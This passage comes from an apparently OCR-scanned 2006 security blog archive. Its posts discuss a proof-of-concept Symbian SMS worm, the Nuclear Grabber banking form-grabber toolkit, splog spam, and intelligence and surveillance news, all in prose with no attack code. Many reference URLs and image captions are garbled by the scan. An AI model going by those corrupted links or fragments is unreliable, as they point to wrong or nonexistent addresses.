4. http://planetinternet .wordpress .com/2006/04/19/lessons- from-3g-in- japan-and-south-korea/ 
5 

6 

7 


ttp://www.usatoday.com/tech/news/techinnovations/2003-11-14-location_x.htm 


. http: //www.face-rec.org/interesting-papers/ 
. http: //slashdot . org/articles/06/09/01/2334239. shtml 


2.10.27 Greetings Professor Falken (2006-10-29 01:43) 


[1] 
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The [2]classic that originally started the war dialing generation 


seems to never fade, and its core idea of simulating a Global Thermonuclear War has moti- 
vated [3]the authors of [4]Defcon - The Game to come up with a fully realistic representation 
of it. | recently took the time to play around with it - it’s so compact you can even play it on 
a removable media -, and | must say | never enjoyed seeing my missile projections and the 
sound effects out of my launches. [5]The trailer speaks for itself! 


Rule number one of thermonuclear war, launch your ICBMs as soon as you hear the Defcon 
1 alert, or you risk lossing your silos due to the Als "shooting into the dark" or conducting 
reconnaissance, however, keep one silo - each has 10 ICBMs reaching anywhere on the map - 
as you wouldn't be able to hit the biggest cities by the time you don’t neutralize the surrounding 
air-defense. Submarines are sneaky and very powerful with each holding 5 missiles, but firing 
occures if the target is within range so make sure you position yourself where you should be. 
Sea and air-to-air battles are very common and there aren’t any land conflicts at all. Make sure 
you don’t fire from numerous submarines simultaneously, as if there’s a figher in the air it will 
detect and attack the submarrine. On the other hand, use fighters to distract the air-defense 
firing at them while your ICBMs pass through and reach their target. If | were to descibe the 
WarGames simulation in two words, that would be, tense and very addictive. Moreover, you 
don’t need a multi-million game or movie budget to make an impression, as this game, and 
"[6]The Day After" do. Goodbye Europe - alliances are a powerful force given you convince 
some Als to ally with you, but at the end there could be only one winner. 


. http://www. introversion.co.uk/defcon/videos/trailer1.wm 


1 
2 
3, http://www. introversion.co.uk/detcon/ 
4, http://en.wikipedia.org/iki/DEFCON_(computer_gane)] 
5 
6. http://mmv. ind .con/title/+%0085404/ 


2.10.28 Fake Search Warrant Generator (2006-10-30 17:40) 


[1] |. aims Senter | In response to [2]Christopher Soghoian’s home raid - the 
[3]masked superhero by night - a [4]fake search warrant generator was just released : 


"for district courts all across the United States with the intent of improving national secu- 
rity by reducing the amount of time it takes for our public guardians to create search warrants." 


Sarcasm’s most effective when having a point. 
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2.11 November 


2.11.1 Proof of Concept Symbian Malware Courtesy of the Academic World 
(2006-11-01 19:03) 


[1] * Know your enemy to better predict his moves and future strategies as Symbian 
[2]malware optimization is getting the necessary attention from the academic community : 


"The University of Santa Barbara’s software group released the [3]source code for their 
proof of concept ‘Feakk’ worm that was developed by Paul Haas in March 2005. The worm 
uses SMS to send a hyperlink to its target. The targeted user then has to visit the hyperlink 
and download and acknowledge three sets of prompts in order for the worm to install, at which 
point it will immediately start to run in the background. It will scan the user’s contact list and 
send a message to each contact (including the recipients’ names) and will also scan for new 
contacts at certain intervals. 


Upon installation, the worm checks for a contact with the first name "HACKME." If this 
isn’t found the worm will exit. If itis found, then the worm sends itself to every mobile number 
it finds in the user’s contact list. The author did not write a payload because this was for 
demonstration purposes only and it should be noted that it can be removed via the "Uninstall 
List." 


While malware authors will turn the concept into a commodity, it doesn’t exploit a spefi- 
cic OS vulnerability, thus the possibility of large scale outbreaks doesn’t really exist at all. In 
a [4]previous post | commented on some future developments related to the penetration of 
mobile devices in our daily lifes and the trust factor assuming whoever holds the handset is 
actually the one using it : 


"Malware authors indeed have [5]financial incentivesto futher continue recompling pub- 
licly available PoC mobile malware source code, and it’s the purchasing/identification features 
phones, opening a car with an SMS, opening a door with an SMS, purchasing over an SMS or 
direct barcode scanning, mobile impersonation scams, harvesting phone numbers of infected 
victims, as well as unknowingly interacting with premium numbers are the things about to get 
directly abused - efficiently and automatically." 


Digitally fingerprinting mobile malware may be marketable, but it’s [6]rather useless as 
we've seen in the past compared to basic user awareness. 


| feel the [7]University of Santa Barbara’s software group are very much on the right 
track, conducting research on OS and application specific vulnerabilities, as they’ve released 
quite some interesting papers during 2006 : 


[8]Advanced Attacks Against PocketPC Phones 

[9]PocketPC MMS - Remote Code Injection/Execution Vulnerability and Denial-of-Service 
[10]Vulnerability Analysis of MMS User Agents 

[11]Security of Smart Phones 

[12]Using Labeling to Prevent Cross-Service Attacks Against Smart Phones 


1. http: //www.symantec.com/enterprise/security_response/weblog/2006/10/university_of_santa_barbara_re.htm 
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. http://ddanchev.blogspot . com/2006/09/benchmarking-and- optimising-malware .htm 
. http://www.cs.ucsb.edu/~rsg/projects/smartphones/cell.zip 


ttp://ddanchev. blogspot .com/2006/08/bed-time-reading-symbian-os-platform_12.htm 


. http: //www.symantec.com/avcenter/venc/data/trojan.redbrowser.a.htm 
. http: //www.securityfocus.com/news/11379 
. http://www.cs.ucsb.edu/~rsg/projects/smartphones/ 


ttp://www.cs.ucsb.edu/~rsg/projects/smartphones/2006_mulliner_DEFCON_slides. pdf 


. http: //www.cs.ucsb.edu/~rsg/projects/smartphones/mms_advisory.txt 


ttp://www.cs.ucsb.edu/~rsg/projects/smartphones/2006_mulliner_vigna_ACSAC. pdf 


11. http://www.cs.ucsb.edu/~rsg/projects/smartphones/2006_mulliner_MSThesis. pdf 


py 
2 
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N 


ttp://www.cs.ucsb.edu/~rsg/projects/smartphones/2006_mulliner_vigna_dagon_lee_DIMVA. pdf 


2.11.2 FAS’s Immune Attack Game (2006-11-01 20:09) 


[1] ™ [2]Professor Falken would have loved this one. The Federation of American Scientists 
recently released their [3]report from the [4]Summit on Educational Games, and an upcoming 
educational game : 


"Immune Attack is a first person strategy PC video game that teaches immunological principles 
through entertaining game play. The protagonist, a teenaged prodigy with a unique 
condition in which the immune system is “present, yet non-functional”, must pilot 
a microscopic nanobot to save his own life. He must teach his semi-functional immune 
system to fight off diseases and bacterial/viral infections by programming individual cell types. 
This programming is accomplished through the successful completion of various educational 
minigames, each of which teach a central immunology principle and, once completed, confer 
added ability to the selected cell type." 


Here’re two more reports you may find informative on [5]the future of learning [6]through 
games - the [7]game addicts still got a chance. 


_tpi//photost blogger .con/ blogger? /4089/2987/1600/NacrophageBacteria.0.jpd 
_ http: //adanchey blogspot. con/2006/10/greet inge-professor~fallcen hea] 

. http://fas .org/gamesummit /Resources/Summit’,200n/,20Educat ional/,20Games . pdf 
| hecp://fa0,ong/genosumnit/ 

ftp: //nwv ora, ong/seporta/cjbarinfrasteactare pid 


ttp://www.academiccolab. org/resources/gappspaper1. pdf 


NOU BWN EP 


ttp://www.yikers.com/video_kids_addiction_to_world_of_warcraft_ruins_his_familys_life.htm 
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2.11.3 Delicious Information Warfare - Friday (2006-11-03 04:04) 


[1] Wish | could blog everything | read and makes me [2]an 
impression but that’s not the point. The point is to emphasize on the big picture, and find the 
balance between information overload and information underload. 


01. [3]North Korea, Turkmenistan, Eritrea the worst violators of press freedom - Jour- 
nalists in North Korea, Eritrea, Turkmenistan, Cuba, Burma and China are still risking their life 
or imprisonment for trying to keep us informed. to [4]FreeSpeech [5]Censorship 


02. [6]When North Korea Falls - The furor over Kim Jong II’s missile tests and nuclear 
brinksmanship obscures the real threat: the prospect of North Korea’s catastrophic collapse. 
How the regime ends could determine the balance of power in Asia for decades. The likely 
winner? China to [7]Geopolitics 


03. [8]U.S. revives terror data mining - In response to concerns about the program’s 
privacy and civil liberties implications, Congress in 2003 cut all funding for it, but research 
continued in different agencies, funded by classified appropriations for Pentagon intelligence 
agencies. to [9]Intelligence [10]Terrorism 


04. [11]Singapore Slings Censorship - StarHub Cable Vision of Singapore is being fined 
$6,350 for showing footage of lesbian sex and bondage during episodes of the reality program 
"Cheaters." to [12]Censorship [13]Singapore 


05. [14]Googlers Worldwide - Number of Google employees 2004-2006. to [15]Google 


06. [16]Can IPS Alleviate The Botnet Problem? - Next-Generation IPS devices bring a 
number of extra benefits, and solve many of the botnet problems. When deployed at the 
network edge, IPS devices can see all traffic entering and exciting the network. to [17]Security 
[18]Malware [19]Botnet [20]IPS 


07. [21]Abu Ghraib Photos, Videos To Come - The ACLU has sought the release of 87 
photos and four videotapes taken at the prison as part of an October 2003 lawsuit demanding 
information on the treatment of detainees in U.S. custody and the transfer of prisoners to 
countries known to use torture. to [22]Military [23]PSYOPS 


08. [24]’Censorship’ controversy? Sometimes it’s just part of the ad campaign - NBC 


and the CW network had refused to run ads in which the singer Natalie Maines refers to 
President George W. Bush with an expletive and as "dumb." to [25]Censorship [26]Advertising 
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09. [27]Rutkowska: Anti-Virus Software Is Ineffective - Stealth malware researcher Joanna 
Rutkowska discusses her interest in computer security, the threat from rootkits and why the 
world is not ready for virtual machine technology. to [28]Malware [29]Interview 


10. [30]Under Fire, Soldiers Kill Blogs - Some of the web’s more popular "milblogs" - 
blogs maintained by present or former active duty military personnel - are going quiet 
following a renewed push by U.S. military officials to scan sites for security risks. to [31]Blog 
[32]Military [33]OPSEC 


11. [34]ls Google Evil? - Internet privacy? Google already knows more about you than 
the National Security Agency ever will. to [35]Google [36]Privacy 


12. [37]Google Earth Update of Eyeballs 1 - ECHELON’s Global Stations - Sebana Seca 
Echelon Station, Pine Gap Echelon Station, Geraldton Echelon Station, Misawa Echelon Station, 
Kunia Echelon Station, Waihopai Echelon Station. to [38]OSINT [39]ECHELON [40]Intelligence 
[41 ]SIGINT 


13. [42]U.N. blasts Cisco, others on China cooperation - "It’s the same equipment that 
we sell in every country around the world in which we sell equipment," said Art Reilly, Cisco’s 
senior director for strategic technology policy. "There is no differentiation." to [43]Censorship 
[44]China [45]Microsoft [46]Google [47]Yahoo [48]Cisco 


14. [49]GAO: Better coordination of cybersecurity R &D needed - DOD officials told 
GAO that the department provided about $150 million to its cybersecurity research programs 
in fiscal 2005. to [50]Security 


15. [51]The Reinvention Of Martha Stewart - Stewart no longer has total control over 
the brand she built. She still owns the bulk of the company’s stock and holds 92 % of the 
voting power-prompting speculation that she may one day take it private-but she can’t dictate 
the agenda. to [52]Branding 


16. [53]Raytheon Announces Revolutionary New ’Cockpit’ For Unmanned Aircraft - "We 
took the best-of-breed technologies from the gaming industry and coupled them with 35-years 
Raytheon UAS command and control expertise and developed a state-of-the-art universal 
cockpit built around the operator". to [54]Military [55]UAV 


17. [56]The Tangram Intelligence Program - The Tangram program makes no distinction 
between intentional and deliberate acts to avoid detection versus the consequences of spotty 
collection and reporting of intelligence. to [57]Intelligence [58]TIA [59]Tangram 


18. [60]Intellipedia - a Classified Wiki - Intellipedia is a classified wiki that runs on JWICS, 
the top-secret network Intelink that links the 16 agencies that comprise the U.S. intelligence 
community. It is not accessible to the public. to [61]Intelligence [62]Wikipedia 


19. [63]China: We don’t censor the Internet. Really - We have hundreds of journalists 
in China, and some of them have legal problems. It has nothing to do with freedom of 
expression. to [64]Censorship [65]China [66]FreeSpeech 


20. [67]Ratings Table of EU and Leading Surveillance Societies - This year Privacy Inter- 
national took the decision to use the report as the basis for a ranking assessment of the 
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state of privacy in all EU countries together with eleven benchmark countries. to [68]Privacy 
[69]Surveillance [70]1984 


21. [71]Watch a live spam bot in action - Take a peek with me into one trojan’s junkmail 
activities. The following account is happening as | type, and shows that some image spam is 
not unique even though it appears to be random. to [72]Malware [73]Bots [74]Spam 


22. [75]OS X proof of concept virus -Macarena - OSX.Macarena is a proof of concept 
virus that infects files in the current folder on the compromised computer. to [76]Malware 
[77]MAC 


23. [78]American Leadership and War - Which presidents and political parties were re- 
sponsible for America’s deadliest wars? Republicans, Democrats, or the Founding Fathers? 
This map answers our question by illustrating the history of American conflict from the 
Revolutionary War to Iraq. to [79]Military [80]War [81]Leadership 


24. [82]Diebold slams HBO Hacking Democracy documentary - According to Diebold, 40 
per cent of votes this November will be recorded electronically with its own machines 
accounting for 40 per cent of that market. to [83]Security [84]Diebold [85]Voting 


. http: //photos1. blogger. com/blogger2/4099/2257/1600/infowar_soldier. gif 
. http://del.icio.us/DDanche 


ttp://www.rsf.org/rubrique.php3?id_rubrique=639 
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. http://del.icio.us/DDanchev/Geopolitics 


. http: //washingtontimes.com/national/20061025 
ttp://del.icio.us/DDanchev/Intelligence 
. http: //del.icio.us/DDanchev/Terroris 
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11. 
12. 

13. 

14. 

15. 

16. http://www.securitypronews.com/news/securitynews/spn-45-20061026CanIPSAlleviatetheBotnetProblem. html 
17. 

18. 

19. 

20 


. http://www. jihadunspun.com/intheatre_internal . php?article=106633%list=/home . php 


22. http://del.icio.us/DDanchev/Militar 
23. http://del.icio.us/DDanchev/PSYOP 
. http://www. iht.com/articles/2006/10/29/business/film.php 


25. http://del.icio.us/DDanchev/Censorship 


26. 

. http://www. eweek.com/article2/0, 1759, 2040760, 00.asp?kc=EWRSS03129TX1K0000614 
28. 
30. 
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31. http://del.icio.us/DDanchev/Blog 

32. http://del.icio.us/DDanchev/Militar 

33. http://del.icio.us/DDanchev/OPSEC 

34. bhttp://www.mother jones .com/news/feature/2006/11/google.htm 
35. http://del.icio.us/DDanchev/Google 

36. http://del.icio.us/DDanchev/Privac 

37. http://cryptome. org/google/google-updatel . ht. 
38. http://del.icio.us/DDanchev/OSIN 

39. http://del.icio.us/DDanchev/ECHELO. 

40. http://del.icio.us/DDanchev/Intelligence 

41. http://del.icio.us/DDanchev/SIGIN 

42. http://news.com.com/2100-1028_3-6131010. htm 
43. http://del.icio.us/DDanchev/Censorship 

44. http://del.icio.us/DDanchev/China 

45. http://del.icio.us/DDanchev/Microsoft 

46. http://del.icio.us/DDanchev/Google 

47. http://del.icio.us/DDanchev/Yahoo 

48. http://del.icio.us/DDanchev/Cisco 

49. http://www. gcn.com/online/vol1_no1/42465-1.htm 
50. http://del.icio.us/DDanchev/Securit 

51. http://www. businessweek. com/magazine/content/06_45/b4008076. htm 
52. http://del.icio.us/DDanchev/Branding 


ttp://www.spacewar.com/reports/Raytheon_Announces_Revolutionary_New_Cockpit_For_Unmanned_Aircraft_999.ht 


54. http://del.icio.us/DDanchev/Militar 

55. http://del.icio.us/DDanchev/UA 

56. http://www. cryptome.org/tangram-intel.htm 

57. http://del.icio.us/DDanchev/Intelligence 

58. http://del.icio.us/DDanchev/TIA 

59. http://del.icio.us/DDanchev/Tangra 

60. http://en.wikipedia.org/wiki/Intellipedia 

61. http://del.icio.us/DDanchev/Intelligence 

62. http://del.icio.us/DDanchev/Wikipedia 

63. http://news.com.com/Chinat+tWe+dont+censor+the+Internet .+Really/2100-1028_3-6130970.htm 

64. http://del.icio.us/DDanchev/Censorship 

65. http://del.icio.us/DDanchev/China 

66. http://del.icio.us/DDanchev/FreeSpeec 
ttp://www.privacyinternational.org/article.shtm1?cmd/,5B347/5D=x- 347- 54522 


68. http://del.icio.us/DDanchev/Privac 
69. http://del.icio.us/DDanchev/Surveillance 


70. http://del.icio.us/DDanchev/1984 
71. bttp://www.avertlabs.com/research/blog/?p=12 
72. http://del.icio.us/DDanchev/Malware 


73. http://del.icio.us/DDanchev/Bots 
74, bttp://del.icio.us/DDanchev/Spam 


ttp://www.symantec.com/enterprise/security_response/writeup. jsp?docid=2006- 110217-1331-99&tabid=1 


76. 

77. 

78. 
79. 
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80. 
a1. 

82. 
83, 

24, 

85. 


2.11.4 The Blogosphere and Splogs (2006-11-07 23:38) 


New Blogs per Day | Technorati 


Nemes teeny wanes mane ry Gees Ramen et teen 
Re GP 00 wee meme Sen we ee | 


[1] Just read Technorati’s latest "[2]State of the Blogosphere, 
October, 2006" presented with in-depth visual stats on the 57 million blogs they’re currently 
tracking, and yes, all the splogs they’re fighting to filter. Worth taking your time to go through 
the post, and you may also be interested in finding how come my [3]ROI out of blogging is so 
positive these days. 


"As we’ve said in the past, some of the new blogs in our index are Spam blogs or ‘[4]splogs’. 
The good news is Technorati has gotten much better at preventing these kinds of blogs from 
getting into our indexes in the first place, which may be a factor in the slight slowing in the 
average of new blogs created each day. 


The spikes in red on the chart above shows the increased activity that occurs when spammers 
create massive numbers of fake blogs and try to get them into our indexes. As the chart 
shows, we’ve done a much better job over the last quarter at nearly eliminating those red 
spikes. While last quarter | reported about 8 % of new blogs that get past our filters 
and make it into the index are splogs, I’m happy to report that that number is 
now more like 4 %. As always, we'll continue to be hyper-focused on making sure that new 
attacks are spotted and eliminated as quickly as possible. 


My gut feeling is that since we’re better at dealing with Spam now, even some of the 
blue areas in last quarter’s graph were probably accountable to spam, which would mean 
that rather than the bumpy ride shown above, we’re actually seeing a steady increased (but 
slower) growth of the blogosphere. Hopefully we'll be able to have a more detailed analysis of 
these issues next quarter." 


Meanwhile, the [5]splogfigher is doing an amazing job of analyzing and coming up with exact 
splog URLs - I’m reposting so that third-parties of particular interest reading here take a notice 
- and week ago came up with [6]150,000 splogs, notice the dominating blogging platform? 
Blogspot all the way! 


"| see that Google has been deleting quite a large number of splogs but even then they are on 
average about 20 % effective. What that means is if a single soammer creates 1000 splogs, 
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Google will eventually delete at most about 200 of them leaving 800 alone. Obvously this is 
rather poor percentage and hopefully my efforts will bump up that figure close to 90 % and 
above. [7]20061030 _1.txt- 19401 splogs 

[8]20061030 _2.txt- 4332 splogs 

[9]20061030 _3.txt- 8936 splogs 

[10]20061030 4.txt- 8794 splogs 

[11]20061030 _5.txt- 18912 splogs 

[12]20061030 _6.txt- 5158 splogs 

[13]20061030 _7.txt- 70755 splogs 

[14]20061030 _8.txt- 1182 splogs 

[15]20061030 9.txt- 11410 splogs 

[16]20061030 10.txt- 968 splogs 

[17]20061030 _11.txt- 1584 splogs 

Here is a tarball of all splog list files listed above: [18]20061030.tar.gz" 


Obviously, spammers are exploiting Blogspot’s [19]signup process, and | really feel it’s 
about time Google starts tolerating more errors with users having trouble reading a sophisti- 
cated CAPTCHA, compared to its current too user-friendly and [20]easily defeated one. They 
can balance for sure. Something else to consider, take for example the [21]splogs collected 
for May, and whole the splogfighter is pointing out on the engineered 404s and Google’s 
efforts in removing them, | was able to verify content response from over 200 splogs reported 
back then, take cigar-accessories-2008.blogspot.com for instance - anyone up for crawling 
the lists and clustering the results? Once the signup process is flawed, not even the wisdom 
of crowds flagging splogs can help you. 


Another recommended and very recent analysis "[22]Characterizing the Splogosphere" 
is also full of juicy details, and statistical info on the emerging problem. Spammers are 
anything but old-fashioned. 


1. http://photos1 . blogger . com/blogger2/4099/2257/1600/S1ide0004- 10. gif 

2, esp: //vechuoretd_con/ebiog/2006/11/164. hea 

3, htp://adanchev. blogspot con/2006/10/return-on-investnentof blogging. heal 
4. hetp://en-ikipetia.org/eika/Syiod 

5. hep: //tightsplog. blogspot. con/ 

6. http://fightsplog. blogspot .com/2006/10/big-batch-of-splogs.html 

7, htp:/ /desplog.org/txt/2006/10/30/2006i080_1. ext 

8. neep://desplog.org/¢xt/2006/10/30/20061050_2. txt 

o, htp://desplog. org/¢xt/2006/10/30/20061030_8.cxt 


. http://desplog.org/txt/2006/10/30/20061030_4.txt 

. http://desplog.org/txt/2006/10/30/20061030_5.txt 
12. bttp://desplog.org/txt/2006/10/30/20061030_6.txt 
. http://desplog.org/txt/2006/10/30/20061030_7.txt 

. http://desplog.org/txt/2006/10/30/20061030_8.txt 

. http://desplog.org/txt/2006/10/30/20061030_9.txt 

. http://desplog.org/txt/2006/10/30/20061030_10.txt 
17. http: //desplog.org/txt/2006/10/30/20061030_11.txt 
. http: //desplog.org/txt/2006/10/20061030. tar.gz 

. http://www.blogger.com/signup.g 
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. http://sam.zoy.org/pwntcha/ 
. http://fightsplog.blogspot.com/2006/05/big-batch-of-splogs.htm 
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22. http://www. blogpulse .com/www2006-workshop/papers/splogosphere. pdf 


2.11.5 All Your Electromagnetic Transmissions Are Belong To Us (2006-11-09 17:07) 


ESE 


[1] This is [2]worth mentioning, as while you try not to talk about 
[3]these locations for as long as someone doesn’t start blowing the whistle too loud, all you 
really need is someone to pass by and feel the hypersensitive harassment due to Triming- 
ham’s ELINT capabilities - and [4]news [5]articles [6]keep [7]coming about this particular case. 


"The Ministry of Defence has admitted that a fault at a radar dome was responsible for 
causing electrical problems with dozens of cars. Engines and lights cut out and speedometer 
dials swung up to 150mph as motorists drove past the dome. At the time the MoD said there 
was no guarantee that the Trimingham radar on the north Norfolk coast was the cause." 


Read some of the memories of a serviceman that was stationed there [8]during the 60s 


"Another story that might be of interest relates to the time that a Russian trawler went 
aground at Skaw. The indications were that it was an Elint (Electronic intelligence gathering) 
vessel as the crew hid what they were doing from an RAF Shackleton which flew overhead as 
part of the search and rescue mission. Whether there was any spying equipment on board 
is debatable. In any event, the Unst folk did well in "liberating" fishing nets and sundry bits 
and pieces including the steering wheel, which was subsequently returned to the Russians. 
However, two RAF lads a steward and a cook found signals, maps and other papers in the 
skipper’s cabin, some of this hidden under his mattress. They brought these back to me and 
our station intelligence officer had a look at them. By chance he was a Russian linguist and 
was able to provide a summary of what was in the documents before they were forwarded to 
the RAF intelligence staff at the Ministry of Defence. One of the documents proved extremely 
valuable to the Navy but what amazed them was that the translated summary had been done 
by an RAF flying officer on Unst." 


You may also be [9]interested in going through a table that "includes all military sites which 
have significant intelligence-gathering or analysis capability with official US presence; these 
are the sites which have figures for numbers of US and UK personnel". 


Trimingham’s radar dome courtesy of [L0]munktOn, and [11]Flickr’s Radars group. 


Related posts: 
[12]Why’s that radar screen not blinking over there? 
[13]Achieving Information Warfare Dominance Back in 1962 
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. http: //www.guardian.co.uk/uk_news/story/0, , 1714941, 00.htm 
. http: //www.theregister.co.uk/2006/02/28/car_molesting_radar/ 
. http: //www.thisislondon.co.uk/news/article-23373150-details/Norfolk 


9. http://www.staff.ncl.ac.uk/d.f.j.wood/thesis_app2.htm 
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2.11.6 The Nuclear Grabber Toolkit (2006-11-09 21:32) 


Al adarmation on thes ute is gooen erchestoely 

in Uhe eDocetional par poses 

AD peogeams ace intended only lor testing and 

reeraling colarrahility ov perseaal compaters a) 
cee porate metworks. 
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(1) frien Come In case you’re unaware of [2]Nuclear Grabber’s existence - 
[3]Babelfish it -WebSense commented on it in their latest "[4]Security Trends - first half of 
2006 report" : 


‘ 
ij 


"Another toolkit example is Nuclear Grabber, which allows an attacker to sit on a real banking 
site and grab data from electronic forms. Like WebAttacker, this tool is available on Russian 
websites. The cost of Nuclear Grabber is a hefty $3,000." 


It’s actually "3250 USD for a server size of 50-53kb" as the site says - perceived pricing and 
profit margins greed thankfully ruin its popularity from my point of view. Advanced [5]form 
grabbers like this one are always very ugly - tavarish chto vui being so [6]knowledgeable, yet 
so malicious messing up with the entry barriers in this space?! 


—= ~B 
— - ae -— —_a.—— - 
yi 


[7] EE [8]Full scale automation in [9]Jaction, quite some infected folks 
geolocated already. Going to wash my hands now.. 


1. http://photos1.blogger .com/blogger2/4099/2257/1600/nuclear1 .png 
2. http://corpsespyware .net/nuclear.htm 


653 


3 
4 
5 

6. 

1 

8 

9. 


ttp://www.bleedingthreats .net/cgi-bin/viewcvs.cgi/sigs/MALWARE/MALWARE_Corpsespyware?rev=1. 


2.11.7 Bill Gates on Traffic Acquisition and Internet Bubbles (2006-11-13 01:23) 


[1] Confused [2]Bill Gates, but a regularly attacked one too. A 
rather predictable comment given he’s not the only one selling the chewing gums and the 
soaps this time, so keep on bubbling folks. Think mature Web 2.0, think [3]Semantic web, or 
at least dare to envision - Microsoft wishes the Internet was never invented, unless of course 
they could sell you the license to use it. 


"There are a hundred YouTube sites out there," Gates said during an interview with a 
group of journalists in Brussels before a speech to European lawmakers. "You never know. It’s 
very complicated in terms of what are the business models for these sites." Some of them, 
including sites that offer Web-based word processing and search engines, are being promoted 
by their creators and analysts as possible competitors to makers of retail packaged software 
like Microsoft. "We’re back kind of in Internet-bubble era in terms of people thinking: ’O.K., 
traffic. We want traffic. We want traffic,”" Gates said. "There are still some areas where it is 
unclear what’s going to come out of that." 


The very basics of Internet marketing which transform branding into communication, seg- 
ments into communities for instance doesn’t necessarily mean that traffic is the cornerstone 
of E-business. Eyeballs, thus participants marely visitors converted into revenue sources 
speak for themselves. Win-win-win business models need no comment. Once you get the 
traffic, boy, what wonders are there for you to discover, sense and profitably respond to. But 
then again, keep in mind that search and online video represent a tiny portion of the overal 
Internet user’s activities. Don’t look for the next Google, or the next YouTube, look beyond. 


Having R &D centers on [4Jenemy territories creates more job opportunities, and improves 
Microsoft’s comfortability with its stakeholders : 


"Microsoft said that it would invest $7.8 billion globally in research and development 
this year, about 15 percent of sales, and it plans to spend $500 million in Europe next year. 
Microsoft operates its main European research center on the campus of Cambridge University 
in England, with other research offices in Denmark and Ireland." 


While it’s also cheaper to operate them in Europe than in the U.S, [5]money cannot buy 
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innovation and [6]many other things, so don’t get [7]too excited but learn [8]how to surf tidal 
waves, the ones Bill Gates himself predicted back in 1995. 


Related posts: 

[9]5 things Microsoft can do to secure the Internet, and why it wouldn’t? 
[10]Microsoft in the Information Security Market 

[11]Microsoft’s OneCare Penetration Pricing Strategy 


1. http://photos1. blogger .com/blogger2/4099/2257/1600/Microsoft_Live. jpg 


5 ee pare ocorneecetnees con) eectory eczoz tal 

3, hep: //en.vikipedia.org/siki Semantic, Web 

4. http://www.crn.com.au/story .aspx?CIID=68214&src=site-marq 

5, ep: /photost. blogger con/blogger/1988/1779/1600/80_spending jp 

6, ftp: //adanchey. blogopet con/2006/01 [outage mpuey-cannot buy. neal 

7 nstp:/ money cnn. con/2006/03/30/news /nevsaakers/ gates, hovivork, fortane/ 
8. 


ttp://www.businessweek.com/1996/29/b34842. ht 


ttp://ddanchev.blogspot.com/2006/03/5-things-microsoft-can-do-to-secure.htm 


ttp://ddanchev. blogspot .com/2006/05/microsoft-in-information-security.htm 


11. http://ddanchev. blogspot .com/2006/08/microsofts-onecare-penetration-pricing. htm 


2.11.8 Jihadi PSYOPS - CIA Attacks on Terrorist Websites (2006-11-13 03:42) 


* Last week, the Internet Haganah [1]reported on rumors around jihadist forums, namely, 
that the [2]CIA has been attacking jihadi web sites. 


Now while this is [3]totally untrue - the CIA would rather be monitoring instead of shut- 
ing them down, or shut them down only after they’ve gathered enough info - it’s a good 
example of twisting the facts to improve the productivity and self-esteem of the jihadists 
supposed to strike back. 


1. http: //internet-haganah. org/harchives/005770.htm 
2. http: //internet-haganah.org/harchives/005770 .htm 
3. http://www. haganah.org.il/harchives/005774. htm 


2.11.9 U.S No-Fly-List Enforced at Deutsche Bank NYC (2006-11-14 02:51) 


[1] * Apparently, the [2]no-fly-list has been recently used as an [3]access control measure 
at the Deutsche Bank’s NYC’s office according to the DealBreaker : 


"We hear Deutsche Bank’s super-suped-up security extends beyond just the beefy armed 
guards patrolling the street outside its headquarters at 60 Wall. Yesterday apparently a 
consultant who was scheduled to attend a meeting at the bank was denied entry because his 
name appears on the federal “no fly” list. “It was the most intense security I’ve seen, except 
for maybe the Israeli consulate,” a source who was present when the consultant was denied 
entry tells DealBreaker." 


While that’s a very unpragmatic paranoia, a [4]U.S congresswoman seems to have re- 
cently experienced the "no-fly-list trip" too : 
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"Sanchez said her staff had booked her a one-way ticket from Boise, Idaho to Cincinnati 
through Denver. Her staff, however, was prevented from printing her boarding pass online 
and were also blocked from printing her boarding pass at an airport kiosk. Sanchez said she 
was instructed to check in with a United employee, who told her she was on the terrorist 
watch list. The employee asked her for identification, Sanchez recalled. "| handed over my 
congressional ID and he started laughing and said, ‘I’m going to need an ID that has your 
birthday on it," Sanchez said in a phone interview with The Associated Press. The employee 
used Sanchez’s birth date to determine that she was not the same Loretta Sanchez listed in 
the database and she was able to board her flight, she said." 


[5]Bureaucrats don’t just slow down innovation and take credit for it, but when they also fall 
down from a window it takes a week for them to hit the ground. 


1. http: //photos1.blogger.com/blogger2/4099/2257/1600/common_sense. jpg 
2. http: //en.wikipedia.org/wiki/No-fly_list 
3. http: //www.dealbreaker.com/2006/11/no_fly_means_no_entry_at_deuts.php 


4. http://www.sfgate.com/cgi-bin/article.cgi?file=/news/archive/2006/10/30/state/n174752839 .DT 


5. http: //ddanchev. blogspot .com/2006/03/are-cyber-criminals-or-bureaucrats.htm 


2.11.10 Satellite Imagery Trade-offs (2006-11-14 03:37) 


[1] ™ Informative to know : 


"Eventually, Andersen said, the big but light telescopes could solve a spy-satellite conundrum. 
Now, those camera equipped satellites must fly closer to Earth to generate usable 
pictures. That means their orbits exceed the speed of Earth’s rotation, so the satel- 
lites cannot spend much time photographing one location. If spy satellites had huge 
telescopes, they could be placed higher above the planet in an orbit that moves at the same 
speed as Earth’s rotation, so they could photograph the same region constantly." 


There’s just one tiny comment that makes a bad impression - “That way, you could keep a 
constant eye on someone like Osama bin Laden” he said." In exactly the say way a security 
consultant wrongly tries to talk top management into increasing a budget by using the buz- 
zword cyberterrorism, it wouldn’t work and it’s a rather desperate move. Even though, in case 
you're interested in keeping track of Bin Laden’s desert trips, make sure you add a detection 
pattern for a [2]white horse riding through Afghanistan. Go through some of my previous posts 
to catch up [3]with [4]my [5]comments on [6]related [7]topics. 


1. http://www. gazette.com/display.php?id=1325576&secid=1 


2. http: //www.zmag.org/content/showarticle.cfm?ItemID=2622 
3. http: //ddanchev. blogspot .com/2006/09/benefits-of-open-source-intelligence.htm 
4. http: //ddanchev. blogspot .com/2006/09/stealth-satellites-developments-source. html 


5. http: //ddanchev. blogspot .com/2006/10/history-and-future-of-us-military.htm 
6. http: //ddanchev. blogspot .com/2006/07/japans-reliance-on-us-spy-satellites.htm 


7. http: //ddanchev. blogspot .com/2006/07/open-source-north-korean-imint.htm 
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2.11.11 Widener University Forensics Course (2006-11-14 04:02) 


[1] * Just noticed that the [2]reading materials for the course are also listing my "[3]Steganog- 
raphy and Cyber Terrorism Communications" post. [4]Looks nice! 


1, ft tp: //photost. blogger .con/blogger2/4008/2957/1600/videner. jpg 
2. netp: //es. widener .edu/~yanako/htal/ courses/Fal106/forensics/coursenat_ heal 
3. http: //ddanchev. blogspot . com/2006/08/steganography-and-cyber-terrorism.html 
4. http://ddanchev. blogspot . com/2006/07/security-research-reference-coverage htm] 


2.11.12 London’s Police Experimenting with Head-Mounted Surveillance Cameras 
(2006-11-20 20:35) 


[1] * [2]Innovative, but a full scale violation of [3]privacy - what privacy with walking CCTVs 
nowadays?! 
